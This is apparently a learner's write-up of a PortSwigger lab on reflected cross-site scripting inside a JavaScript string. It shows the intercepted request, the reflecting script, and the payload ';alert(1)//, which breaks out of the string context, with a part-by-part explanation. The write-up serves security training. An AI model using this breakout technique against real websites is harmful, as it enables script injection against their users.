Reflected XSS into a JavaScript string with angle brackets HTML encoded
Description
This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.
Approach
After accessing the lab, I intercepted the search request:
GET /?search=ichyaboy HTTP/2
Host: 0a58009f03f4d4818b8581c200060086.web-security-academy.net
Cookie: session=CBeYaaChWpXhNJOMgtLNWUsnn3HBPkVj
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...
In the response, I noticed my input was reflected inside a single-quoted JavaScript string within a script block. Angle brackets are HTML-encoded, but the single quote is not:
<script>
var searchTerms = 'ichyaboy';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
To exploit this, I crafted a payload that terminates the string literal, injects a statement of my own, and comments out the leftover closing quote so the script still parses. Here's the payload:
';alert(1)//
This payload works as follows:
';  closes the existing string literal. The single quote is not encoded by the application, and encoding angle brackets does not help here because the browser never decodes HTML entities inside a script block, so the string context is the only thing left to break out of.
alert(1)  runs as a separate statement and triggers the alert.
//  comments out the rest of that line, i.e. the dangling '; left over from the original string, so the script stays syntactically valid. The document.write call on the next line still executes with an empty searchTerms.
After injecting this payload, an alert box popped up, confirming the XSS vulnerability and solving the lab.